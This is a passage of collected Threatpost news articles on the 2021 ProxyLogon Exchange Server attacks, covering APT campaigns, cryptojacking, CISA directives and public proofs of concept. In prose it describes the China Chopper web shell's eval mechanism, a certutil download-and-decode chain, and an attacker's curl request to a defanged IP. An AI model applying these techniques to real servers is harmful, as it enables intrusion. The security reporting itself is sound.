are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). \u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in the Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. \u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowick, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n\n** **\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": "https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTS besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises 